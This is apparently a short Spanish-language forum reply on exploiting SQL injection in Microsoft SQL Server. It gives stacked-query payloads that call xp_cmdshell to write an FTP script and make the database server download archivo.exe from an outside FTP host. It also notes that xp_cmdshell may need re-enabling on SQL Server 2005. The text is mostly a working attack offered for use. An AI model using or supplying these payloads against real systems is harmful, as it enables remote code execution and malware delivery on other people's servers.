En el remoto caso de que el user sea admin y la inyección permita stacked querys puedes hacer:
;master..xp_cmdshell 'cmd /c echo get archivo.exe>asd.txt';
;master..xp_cmdshell 'cmd /c echo quit>>asd.txt';
;master..xp_cmdshell 'cmd /c ftp -s:asd.txt ftp.anonimo.com'
Asi te conectas al server anonimo ftp.anonimo.com y te descargas el archivo archivo.exe. Si la BBDD es mssql server 2005 puede que tengas que reactivar el xp_cmdshell. Busca en internet como se hace que ahora mismo no me acuerdo.jeje. son un par de comandos más.
Saludos!!